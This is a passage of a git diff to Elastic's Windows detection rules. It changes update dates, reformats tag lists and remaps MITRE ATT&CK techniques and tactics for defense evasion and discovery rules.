"https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_suspicious_execution_from_mounted_device.toml b/rules/windows/defense_evasion_suspicious_execution_from_mounted_device.toml index 219ae03cc8f..cf9205c5fcc 100644 --- a/rules/windows/defense_evasion_suspicious_execution_from_mounted_device.toml +++ b/rules/windows/defense_evasion_suspicious_execution_from_mounted_device.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/28" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/23" [rule] author = ["Elastic"] @@ -86,32 +86,15 @@ process where host.os.type == "windows" and event.type == "start" and process.ex [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1127" -name = "Trusted Developer Utilities Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1127/" - -[[rule.threat.technique.subtechnique]] -id = "T1127.001" -name = "MSBuild" -reference = "https://attack.mitre.org/techniques/T1127/001/" - [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [[rule.threat.technique.subtechnique]] id = "T1218.005" name = "Mshta" reference = "https://attack.mitre.org/techniques/T1218/005/" -[[rule.threat.technique.subtechnique]] -id = "T1218.007" -name = "Msiexec" -reference = "https://attack.mitre.org/techniques/T1218/007/" - [[rule.threat.technique.subtechnique]] id = "T1218.010" name = "Regsvr32" @@ -122,19 +105,18 @@ id = "T1218.011" name = "Rundll32" reference = "https://attack.mitre.org/techniques/T1218/011/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -145,7 +127,10 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml b/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml index 74f123093a7..30a19f5a7ff 100644 --- a/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml +++ b/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/21" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -64,7 +64,19 @@ references = [ risk_score = 73 rule_id = "acf738b5-b5b2-4acc-bad9-1e18ee234f40" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -83,51 +95,14 @@ file where host.os.type == "windows" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.003" -name = "CMSTP" -reference = "https://attack.mitre.org/techniques/T1218/003/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.005" -name = "Mshta" -reference = "https://attack.mitre.org/techniques/T1218/005/" +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" -[[rule.threat.technique.subtechnique]] -id = "T1218.010" -name = "Regsvr32" -reference = "https://attack.mitre.org/techniques/T1218/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1047" -name = "Windows Management Instrumentation" -reference = "https://attack.mitre.org/techniques/T1047/" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique]] -id = "T1129" -name = "Shared Modules" -reference = "https://attack.mitre.org/techniques/T1129/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml b/rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml index e3e3d0d65f1..319f6d4e786 100644 --- a/rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml +++ b/rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/11" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/19" [transform] [[transform.osquery]] @@ -103,7 +103,15 @@ references = [ risk_score = 73 rule_id = "2dd480be-1263-4d9c-8672-172928f6789a" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Sysmon"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Sysmon", +] timestamp_override = "event.ingested" type = "eql" @@ -135,13 +143,26 @@ process where host.os.type == "windows" and event.code == "10" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1106" name = "Native API" reference = "https://attack.mitre.org/techniques/T1106/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/defense_evasion_suspicious_scrobj_load.toml b/rules/windows/defense_evasion_suspicious_scrobj_load.toml index 0a146be32cf..8b30df05e2c 100644 --- a/rules/windows/defense_evasion_suspicious_scrobj_load.toml +++ b/rules/windows/defense_evasion_suspicious_scrobj_load.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -94,13 +94,19 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_suspicious_wmi_script.toml b/rules/windows/defense_evasion_suspicious_wmi_script.toml index a429935529b..45706563ed1 100644 --- a/rules/windows/defense_evasion_suspicious_wmi_script.toml +++ b/rules/windows/defense_evasion_suspicious_wmi_script.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -58,7 +58,16 @@ Windows Management Instrumentation Command-line (WMIC) is a powerful tool for ma risk_score = 47 rule_id = "7f370d54-c0eb-4270-ac5a-9a6020585dc6" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -74,13 +83,26 @@ sequence by process.entity_id with maxspan = 2m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1220" name = "XSL Script Processing" reference = "https://attack.mitre.org/techniques/T1220/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/defense_evasion_suspicious_zoom_child_process.toml b/rules/windows/defense_evasion_suspicious_zoom_child_process.toml index ed4551b154d..2b461a36b16 100644 --- a/rules/windows/defense_evasion_suspicious_zoom_child_process.toml +++ b/rules/windows/defense_evasion_suspicious_zoom_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/03" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.osquery]] @@ -105,7 +105,21 @@ This rule identifies a potential malicious process masquerading as `Zoom.exe` or risk_score = 47 rule_id = "97aba1ef-6034-4bd3-8c1a-1e0996b27afa" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs", "Data Source: Crowdstrike", "Data Source: Sysmon"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Windows Security Event Logs", + "Data Source: Crowdstrike", + "Data Source: Sysmon", +] timestamp_override = "event.ingested" type = "eql" @@ -117,23 +131,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" -[[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/defense_evasion_system_critical_proc_abnormal_file_activity.toml b/rules/windows/defense_evasion_system_critical_proc_abnormal_file_activity.toml index c61e96383d9..5c5acb3734e 100644 --- a/rules/windows/defense_evasion_system_critical_proc_abnormal_file_activity.toml +++ b/rules/windows/defense_evasion_system_critical_proc_abnormal_file_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/19" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [transform] [[transform.osquery]] @@ -102,7 +102,20 @@ This rule looks for the creation of executable files done by system-critical pro risk_score = 73 rule_id = "e94262f2-c1e9-4d3f-a907-aeab16712e1a" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -123,26 +136,26 @@ file where host.os.type == "windows" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" +id = "T1211" +name = "Exploitation for Defense Evasion" +reference = "https://attack.mitre.org/techniques/T1211/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/defense_evasion_unsigned_dll_loaded_from_suspdir.toml b/rules/windows/defense_evasion_unsigned_dll_loaded_from_suspdir.toml index 8202a95a100..0828b1440b9 100644 --- a/rules/windows/defense_evasion_unsigned_dll_loaded_from_suspdir.toml +++ b/rules/windows/defense_evasion_unsigned_dll_loaded_from_suspdir.toml @@ -2,7 +2,7 @@ creation_date = "2022/11/22" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic"] @@ -165,18 +165,29 @@ library where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.001" +name = "Invalid Code Signature" +reference = "https://attack.mitre.org/techniques/T1036/001/" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" - [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_untrusted_driver_loaded.toml b/rules/windows/defense_evasion_untrusted_driver_loaded.toml index 3d950d40f57..c9a0df30ca0 100644 --- a/rules/windows/defense_evasion_untrusted_driver_loaded.toml +++ b/rules/windows/defense_evasion_untrusted_driver_loaded.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/27" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/04" [transform] [[transform.osquery]] @@ -119,18 +119,19 @@ driver where host.os.type == "windows" and process.pid == 4 and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1553" -name = "Subvert Trust Controls" -reference = "https://attack.mitre.org/techniques/T1553/" - +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" [[rule.threat.technique.subtechnique]] -id = "T1553.006" -name = "Code Signing Policy Modification" -reference = "https://attack.mitre.org/techniques/T1553/006/" +id = "T1036.001" +name = "Invalid Code Signature" +reference = "https://attack.mitre.org/techniques/T1036/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml b/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml index 0ad876a1e83..ef3d4c6c627 100644 --- a/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml +++ b/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/28" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/28" [rule] author = ["Elastic"] @@ -62,7 +62,16 @@ references = [ risk_score = 47 rule_id = "c7894234-7814-44c2-92a9-f7d851ea246a" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide", "Data Source: SentinelOne"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Resources: Investigation Guide", + "Data Source: SentinelOne", +] type = "eql" query = ''' @@ -79,26 +88,14 @@ sequence by host.id, process.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml b/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml index 73a80fd10f8..f2db06b1ae8 100644 --- a/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml +++ b/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/28" [rule] author = ["Elastic"] @@ -93,31 +93,36 @@ sequence by host.id, process.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [[rule.threat.technique.subtechnique]] id = "T1218.011" name = "Rundll32" reference = "https://attack.mitre.org/techniques/T1218/011/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + + + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/windows/defense_evasion_unusual_process_network_connection.toml b/rules/windows/defense_evasion_unusual_process_network_connection.toml index 89a760e9d11..8dd19e5c315 100644 --- a/rules/windows/defense_evasion_unusual_process_network_connection.toml +++ b/rules/windows/defense_evasion_unusual_process_network_connection.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -95,33 +95,14 @@ sequence by process.entity_id [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" -[[rule.threat.technique.subtechnique]] -id = "T1127.002" -name = "ClickOnce" -reference = "https://attack.mitre.org/techniques/T1127/002/" - -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.003" -name = "CMSTP" -reference = "https://attack.mitre.org/techniques/T1218/003/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.008" -name = "Odbcconf" -reference = "https://attack.mitre.org/techniques/T1218/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_wdac_policy_by_unusual_process.toml b/rules/windows/defense_evasion_wdac_policy_by_unusual_process.toml index 83c9d170fec..236dce5f9bd 100644 --- a/rules/windows/defense_evasion_wdac_policy_by_unusual_process.toml +++ b/rules/windows/defense_evasion_wdac_policy_by_unusual_process.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/28" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -91,18 +91,14 @@ file where host.os.type == "windows" and event.action != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_wsl_bash_exec.toml b/rules/windows/defense_evasion_wsl_bash_exec.toml index 5e040493bbb..f0dae674a7e 100644 --- a/rules/windows/defense_evasion_wsl_bash_exec.toml +++ b/rules/windows/defense_evasion_wsl_bash_exec.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/13" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -64,7 +64,19 @@ references = [ risk_score = 21 rule_id = "3e0eeb75-16e8-4f2f-9826-62461ca128b7" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -91,18 +103,31 @@ process where host.os.type == "windows" and event.type : "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1202" +name = "Indirect Command Execution" +reference = "https://attack.mitre.org/techniques/T1202/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/defense_evasion_wsl_enabled_via_dism.toml b/rules/windows/defense_evasion_wsl_enabled_via_dism.toml index 2c23fc934b5..3fbc2682614 100644 --- a/rules/windows/defense_evasion_wsl_enabled_via_dism.toml +++ b/rules/windows/defense_evasion_wsl_enabled_via_dism.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/13" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -89,3 +89,16 @@ process where host.os.type == "windows" and event.type : "start" and ''' +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1202" +name = "Indirect Command Execution" +reference = "https://attack.mitre.org/techniques/T1202/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_wsl_kalilinux.toml b/rules/windows/defense_evasion_wsl_kalilinux.toml index 9c6fefe207c..1d34d559fbf 100644 --- a/rules/windows/defense_evasion_wsl_kalilinux.toml +++ b/rules/windows/defense_evasion_wsl_kalilinux.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/12" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/28" [rule] author = ["Elastic"] @@ -63,7 +63,20 @@ references = ["https://learn.microsoft.com/en-us/windows/wsl/wsl-config"] risk_score = 73 rule_id = "dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -87,36 +100,14 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1564" -name = "Hide Artifacts" -reference = "https://attack.mitre.org/techniques/T1564/" +id = "T1202" +name = "Indirect Command Execution" +reference = "https://attack.mitre.org/techniques/T1202/" -[[rule.threat.technique.subtechnique]] -id = "T1564.006" -name = "Run Virtual Instance" -reference = "https://attack.mitre.org/techniques/T1564/006/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_wsl_registry_modification.toml b/rules/windows/defense_evasion_wsl_registry_modification.toml index aaf9f735f05..ca02fcc756a 100644 --- a/rules/windows/defense_evasion_wsl_registry_modification.toml +++ b/rules/windows/defense_evasion_wsl_registry_modification.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/12" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -90,13 +90,19 @@ registry where host.os.type == "windows" and event.type == "change" and registry [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" +[[rule.threat.technique]] +id = "T1202" +name = "Indirect Command Execution" +reference = "https://attack.mitre.org/techniques/T1202/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/discovery_active_directory_webservice.toml b/rules/windows/discovery_active_directory_webservice.toml index 8f2800ee80d..56600c5238b 100644 --- a/rules/windows/discovery_active_directory_webservice.toml +++ b/rules/windows/discovery_active_directory_webservice.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/31" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -83,18 +83,14 @@ Active Directory Web Service (ADWS) facilitates querying Active Directory (AD) o [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1018" name = "Remote System Discovery" reference = "https://attack.mitre.org/techniques/T1018/" -[[rule.threat.technique]] -id = "T1087" -name = "Account Discovery" -reference = 